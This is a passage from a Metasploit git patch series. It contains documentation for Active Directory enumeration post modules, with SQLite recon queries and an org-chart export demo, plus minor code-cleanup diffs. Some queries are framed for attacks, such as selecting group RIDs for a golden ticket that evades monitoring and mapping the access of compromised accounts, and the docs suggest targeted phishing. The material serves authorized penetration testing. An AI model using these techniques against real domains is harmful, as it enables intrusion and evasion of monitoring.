u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED = 0 + u_ADS_UF_TEMP_DUPLICATE_ACCOUNT = 0 + u_ADS_UF_NORMAL_ACCOUNT = 1 + u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT = 0 + u_ADS_UF_WORKSTATION_TRUST_ACCOUNT = 0 + u_ADS_UF_SERVER_TRUST_ACCOUNT = 0 + u_ADS_UF_DONT_EXPIRE_PASSWD = 0 + u_ADS_UF_MNS_LOGON_ACCOUNT = 0 + u_ADS_UF_SMARTCARD_REQUIRED = 0 + u_ADS_UF_TRUSTED_FOR_DELEGATION = 0 + u_ADS_UF_NOT_DELEGATED = 0 + u_ADS_UF_USE_DES_KEY_ONLY = 0 + u_ADS_UF_DONT_REQUIRE_PREAUTH = 0 + u_ADS_UF_PASSWORD_EXPIRED = 0 +u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION = 0 + u_SAM_DOMAIN_OBJECT = 0 + u_SAM_GROUP_OBJECT = 0 + u_SAM_NON_SECURITY_GROUP_OBJECT = 0 + u_SAM_ALIAS_OBJECT = 0 + u_SAM_NON_SECURITY_ALIAS_OBJECT = 0 + u_SAM_NORMAL_USER_ACCOUNT = 1 + u_SAM_MACHINE_ACCOUNT = 0 + u_SAM_TRUST_ACCOUNT = 0 + u_SAM_APP_BASIC_GROUP = 0 + u_SAM_APP_QUERY_GROUP = 0 + u_SAM_ACCOUNT_TYPE_MAX = 0 +``` + +SQLite can generate output in HTML format with headers. For example, the query below displays the +username, email address and number of times that the user has logged on for all users who have a +manager with the word 'Stuart' somewhere in the DN. + +``` +sqlite> .mode html +sqlite> .headers on +sqlite> select u_sAMAccountName,u_userPrincipalName,u_logonCount from ad_users where u_manager LIKE '%Stuart%'; + + + + + + + + +sqlite> +``` + +The same query can be used in INSERT mode, in which the results will be displayed as a series of +SQL insert statements for importing into another database: + +``` +sqlite> .mode insert +sqlite> select u_sAMAccountName,u_userPrincipalName,u_logonCount from ad_users where u_manager LIKE '%Stuart%'; +INSERT INTO table(u_sAMAccountName,u_userPrincipalName,u_logonCount) VALUES('unprivileged.user','unprivileged.user@goat.stu',1); +``` + +The default mode (list) will display the results with a pipe character separating the fields: + +``` +sqlite> .mode list +sqlite> select u_sAMAccountName,u_userPrincipalName,u_logonCount from ad_users where u_manager LIKE '%Stuart%'; +u_sAMAccountName u_userPrincipalName u_logonCount +unprivileged.user unprivileged.user@goat.stu 1 +``` + +There are a number of other ways that this information could be presented; please play with SQLite +in order to learn how to use them. + +## Example Queries + +A number of example queries are shown below, in order to give an idea of how easy it is to build up +complex queries. + +Search for all users who have a title, description or comment and display this information along +with their username: + +``` +select u_sAMAccountName,u_title,u_description,u_comment from ad_users where (u_title != "" or u_description != "" or u_comment != ""); +``` + +Display all stored fields for all users whose accounts are not disabled, have a password that does +not expire, have a name starting with 'Frank' and have logged on more than once. + +``` +select * from ad_users where u_ADS_UF_ACCOUNTDISABLE=0 and u_ADS_UF_DONT_EXPIRE_PASSWD=1 and u_cn LIKE 'Frank%' and u_logonCount>1; +``` + +Get the list of group RIDs that have a name which do not have the word 'admin' in them somewhere +(perhaps useful to construct a golden ticket with access to pretty much all groups except anything +with 'admin' in it), might be useful to evade a very basic form of monitoring perhaps? + +``` +select DISTINCT g_rid from ad_groups where g_sAMAccountName NOT LIKE '%admin%'; +``` + +Search for all users who are members of the 'Domain Admins' group and display their username. +Note that this will include those in nested groups. + +``` +select u_sAMAccountName from view_mapping where g_sAMAccountName = 'Domain Admins'; +``` + +Show the groups that the user 'stufus' is a member of and write the output to /tmp/groups.txt +(e.g. for usage in a different tool): + +``` +.once /tmp/groups.txt +select g_sAMAccountName from view_mapping where u_sAMAccountName = 'stufus'; +``` + +Imagine you have compromised passwords or accounts for user1, user2, user3 and user4. Show the AD +groups which, between them all, you have access to. + +``` +select DISTINCT g_sAMAccountName from view_mapping where u_sAMAccountName IN ('user1','user2','user3','user4'); +``` + +Retrieve the list of group names common to both 'user1' and 'user2' and display the group RID, +group name and group description. This could be useful if you were aware that both these users +are in a group that has access to a very specific resource but are in a large number of separate +other groups. + +``` +select v1.g_rid,v1.g_sAMAccountName,v1.g_description FROM view_mapping v1 INNER JOIN view_mapping v2 ON v1.g_rid = v2.g_rid where v1.u_sAMAccountName = 'user1' and v2.u_sAMAccountName = 'user2'; +``` + +Show the name, DNS hostname and OS information for each of the computers in the domain: + +``` +select c_cn,c_dNSHostName,c_operatingSystem,c_operatingSystemVersion,c_operatingSystemServicePack from ad_computers; +``` + +Display the same columns as above but only show machines in the 'Domain Controllers' OU (you can't +normally search by DN because it isn't a "real" attribute when querying through LDAP, but as it is +a normal text field in the database, you can use regular expressions and normal string matching): + +``` +select c_cn,c_dNSHostName,c_operatingSystem,c_operatingSystemVersion,c_operatingSystemServicePack from ad_computers where c_distinguishedName LIKE '%OU=Domain Controllers%'; +``` + +Show all fields for computers that have the c_ADS_UF_WORKSTATION_TRUST_ACCOUNT set to 1 (which +seems to be everything except domain controllers) on my test system: + +``` +select * from ad_computers where c_ADS_UF_WORKSTATION_TRUST_ACCOUNT = 1; +``` + +Show all fields for computers whose operating system is Windows XP, Windows 2000 or Windows 2003 +(note that you need regular expression support in SQLite): + +``` +select * from ad_computers where c_operatingSystem REGEXP '(XP|200[03])'; +``` + +...and if you don't have regular expression support: + +``` +select * from ad_computers where c_operatingSystem LIKE '%XP%' OR c_operatingSystem LIKE '%2000%' OR c_operatingSystem LIKE '%2003%'; +``` + +Search for all members of all groups who are (amongst other things) members of any group managed +by anyone whose CN starts with 'Unprivileged User' and return their username only: + +``` +select DISTINCT u_sAMAccountName from view_mapping where g_rid IN (select g_rid from view_mapping where g_managedBy LIKE 'CN=Unprivileged User%'); +``` + +## Scenarios + +**Group Policy Objects** + +This cannot be used to gain a complete understanding of effective permissions because it does not +analyze group policy objects. For example, a group policy may add inconspicuous groups to +privileged groups and privileged groups, such as Domain Admins, may be removed from local +administrator groups due to GPP. Therefore, this will give a reliable overview of the effective +'static' permissions but cannot be completely relied on for overall effective permissions. + +**Domain Controller interaction** + +The acquisition of domain information does involve repeated queries against the domain controllers. +However, all interaction with AD uses native functionality and has not been noted to cause +performance problems when tested. This was recently tested on a live engagement on a domain that +has just under 11,000 groups and a similar number of users. Admittedly it took about an hour to +pull down everything (as opposed to the 1 minute to replicate the LDAP database) but the final +database size was 19,255,296 bytes, so perfectly manageable. From a3c390ee9dc8a5cdaba19af7cc092dbf4ea2a28f Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 7 Apr 2016 17:11:08 -0500 Subject: [PATCH 679/686] Change class name to MetasploitModule --- modules/post/windows/gather/make_csv_orgchart.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/make_csv_orgchart.rb b/modules/post/windows/gather/make_csv_orgchart.rb index 59b4e3d71b..5dab9a6135 100644 --- a/modules/post/windows/gather/make_csv_orgchart.rb +++ b/modules/post/windows/gather/make_csv_orgchart.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP From ff9d94218da5e4d6fa5fd4e8916b050a92c2ea65 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 7 Apr 2016 17:11:42 -0500 Subject: [PATCH 680/686] Fix a typo? --- modules/post/windows/gather/make_csv_orgchart.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/make_csv_orgchart.rb b/modules/post/windows/gather/make_csv_orgchart.rb index 5dab9a6135..7ede7b3d90 100644 --- a/modules/post/windows/gather/make_csv_orgchart.rb +++ b/modules/post/windows/gather/make_csv_orgchart.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post def initialize(info = {}) super(update_info( info, - 'Name' => 'Generate CSV Organisational Chart Data Using Manager Information', + 'Name' => 'Generate CSV Organizational Chart Data Using Manager Information', 'Description' => %( This module will generate a CSV file containing all users and their managers, which can be imported into Visio which will render it. From cba7353e1d701a274f0293926b74aea558e602da Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 7 Apr 2016 17:12:11 -0500 Subject: [PATCH 681/686] Fix another typo? --- modules/post/windows/gather/make_csv_orgchart.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/make_csv_orgchart.rb b/modules/post/windows/gather/make_csv_orgchart.rb index 7ede7b3d90..3e7e35e884 100644 --- a/modules/post/windows/gather/make_csv_orgchart.rb +++ b/modules/post/windows/gather/make_csv_orgchart.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Post register_options([ OptBool.new('WITH_MANAGERS_ONLY', [true, 'Only users with managers', false]), OptBool.new('ACTIVE_USERS_ONLY', [true, 'Only include active users (i.e. not disabled ones)', true]), - OptBool.new('STORE_LOOT', [true, 'Store the organisational chart information in CSV format in loot', true]), + OptBool.new('STORE_LOOT', [true, 'Store the organizational chart information in CSV format in loot', true]), OptString.new('FILTER', [false, 'Additional LDAP filter to use when searching for users', '']) ], self.class) end From 880697d00a50719b836bf2b67bb6292f5119991d Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 7 Apr 2016 17:17:57 -0500 Subject: [PATCH 682/686] Add documentation for make_csv_orgchart --- .../post/windows/gather/make_csv_orgchart.md | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 documentation/modules/post/windows/gather/make_csv_orgchart.md diff --git a/documentation/modules/post/windows/gather/make_csv_orgchart.md b/documentation/modules/post/windows/gather/make_csv_orgchart.md new file mode 100644 index 0000000000..bd1882b99a --- /dev/null +++ b/documentation/modules/post/windows/gather/make_csv_orgchart.md @@ -0,0 +1,85 @@ +This module can be used to aid the generation of an organizational chart based on information +contained in Active Directory. The module itself uses ADSI to retrieve key information from AD +(manager, title, description etc) fields and then present it in a CSV file in the form: + +``` +cn,description,title,phone,department,division,e-mail,company,reports_to +``` + +The reports_to field is the only one which is generated; everything else is taken directly from AD. +The 'manager' field contains the DN of the manager assigned to that user, and this module simply +uses a regular expression to obtain the CN field of the manager. + +This can then be imported into tools like [Microsoft Visio](https://products.office.com/en-us/visio/flowchart-software) +(using the organizational chart wizard) and it will construct a visual org chart from the +information there. Although visio supports the ability to generate Org charts if it is on a domain +joined machine, but there does not seem to be a way of doing this remotely (e.g. during a +red teaming exercise). + +This should not be confused with security groups and AD managed groups; this is purely an +internal organizational hierarchy representation but could be very useful for situational awareness +or in order to construct a more plausible or targeted internal phishing exercise. + +# Options + +Option | Value +-------------------| --- +ACTIVE_USERS_ONLY | This will restrict the search for users to those whose accounts are Active. This would have the effect of excluding disabled accounts (e.g. employees who have resigned). +FILTER | Any additional LDAP filtering that is required when searching for users. +WITH_MANAGERS_ONLY | If this is TRUE, the module will only include users who have a manger set (internally, this is implemented by adding (manager=*) to the ADSI query filter). This could be useful if not everyone has a manager set, but could mean that the top executive is not included either. +STORE_LOOT | Store the results in a CSV file in loot. You'll almost certainly want this set to TRUE. + +# Demo + +For the purposes of this contrived example, the module has been configured to generate the CSV +reporting information for everyone with 'IT' somewhere in their common name. + +``` +msf post(make_csv_orgchart) > show options + +Module options (post/windows/gather/make_csv_orgchart): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + ACTIVE_USERS_ONLY true yes Only include active users (i.e. not disabled ones) + DOMAIN no The domain to query or distinguished name (e.g. DC=test,DC=com) + FILTER cn=*IT* no Additional LDAP filter to use when searching for users + MAX_SEARCH 500 yes Maximum values to retrieve, 0 for all. + SESSION 2 yes The session to run this module on. + STORE_LOOT true yes Store the organisational chart information in CSV format in loot + WITH_MANAGERS_ONLY false no Only users with managers + +msf post(make_csv_orgchart) > run + +Users & Managers +================ + + cn description title phone department division e-mail company reports_to + -- ----------- ----- ----- ---------- -------- ------ ------- ---------- + IT Manager Deputy GOAT IT Director it.manager@goat.stu IT Director + IT Director Director of Goat IT it.director@goat.stu + IT Leader: Badger Team Leader of Blue Team Operations it.leader.badger@goat.stu IT Manager + IT Leader: Otter Team Leader: Offensive Operations it.leader.otter@goat.stu IT Manager + Oswold Otter (IT Team) Consultant oswold.otter@goat.stu IT Leader: Otter + Bertie Badger (IT Security Team) Default pass is badger123 IT Security Team Deputy bertie.badger@goat.stu IT Leader: Badger + +[*] CSV Organisational Chart Information saved to: /usr/home/s/stuart/.msf4/loot/20151221175733_stufusdev_192.0.2.140_ad.orgchart_189769.txt +[*] Post module execution completed +``` + +The contents of the CSV file are shown below: + +``` +$ cat /usr/home/s/stuart/.msf4/loot/20151221175733_stufusdev_192.0.2.140_ad.orgchart_189769.txt +cn,description,title,phone,department,division,e-mail,company,reports_to +"IT Manager","","Deputy GOAT IT Director","","","","it.manager@goat.stu","","IT Director" +"IT Director","","Director of Goat IT","","","","it.director@goat.stu","","" +"IT Leader: Badger","","Team Leader of Blue Team Operations","","","","it.leader.badger@goat.stu","","IT Manager" +"IT Leader: Otter","","Team Leader: Offensive Operations","","","","it.leader.otter@goat.stu","","IT Manager" +"Oswold Otter (IT Team)","","Consultant","","","","oswold.otter@goat.stu","","IT Leader: Otter" +"Bertie Badger (IT Security Team)","Default pass is badger123","IT Security Team Deputy","","","","bertie.badger@goat.stu","","IT Leader: Badger" +``` + +When this was imported into Visio with default options set, it produced the following organisational chart: + +![screenshot_orgchart](https://cloud.githubusercontent.com/assets/12296344/11937572/f5906320-a80c-11e5-8faa-6439872df362.png) From 068cf8eba116e775a507ce3365fd5b8a206bc194 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 7 Apr 2016 18:23:33 -0500 Subject: [PATCH 683/686] Fix ghetto true/false checking in NOP generator --- modules/nops/x86/single_byte.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 5c09d4586d..4b0242cbb0 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -106,7 +106,7 @@ SINGLE_BYTE_SLED = # Did someone specify random NOPs in the environment? if (!random and datastore['RandomNops']) - random = (datastore['RandomNops'].match(/true|1|y/i) != nil) + random = datastore['RandomNops'] end # Generate the whole sled... From 28875313be0ebe1b2d61cb08e357b7e49aa7b140 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 8 Apr 2016 14:27:52 -0500 Subject: [PATCH 684/686] Change class name to MetasploitModule --- modules/exploits/multi/postgres/postgres_createlang.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb index 910d9526a5..2d4d1c611d 100644 --- a/modules/exploits/multi/postgres/postgres_createlang.rb +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/postgres' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Postgres From 16c599866cd501d0c619ce12248a2b0127ceaf93 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 8 Apr 2016 16:23:33 -0700 Subject: [PATCH 685/686] Bump version of framework to 4.11.21 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index b887521766..ca8cb66d75 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.20) + metasploit-framework (4.11.21) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 93ae4be7e4..2fb8817399 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.20" + VERSION = "4.11.21" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 99b4d0a2d5b46672b0f10e33f9331de8faf2bad5 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sat, 9 Apr 2016 13:49:16 -0500 Subject: [PATCH 686/686] remove more regex-style bool checks --- modules/auxiliary/scanner/http/owa_login.rb | 2 +- modules/auxiliary/server/fakedns.rb | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index 7e47188cb2..efc78770f1 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -158,7 +158,7 @@ class MetasploitModule < Msf::Auxiliary 'Cookie' => 'PBack=0' } - if (datastore['SSL'].to_s.match(/^(t|y|1)/i)) + if datastore['SSL'] if action.name == "OWA_2013" data = 'destination=https://' << vhost << '/owa&flags=4&forcedownlevel=0&username=' << user << '&password=' << pass << '&isUtf8=1' else diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 5a44757437..695a346578 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -70,11 +70,11 @@ class MetasploitModule < Msf::Auxiliary @log_console = false @log_database = false - if (datastore['LogConsole'].to_s.match(/^(t|y|1)/i)) + if datastore['LogConsole'] @log_console = true end - if (datastore['LogDatabase'].to_s.match(/^(t|y|1)/i)) + if datastore['LogDatabase'] @log_database = true end
    Download
    u_sAMAccountNameu_userPrincipalNameu_logonCount
    unprivileged.userunprivileged.user@goat.stu1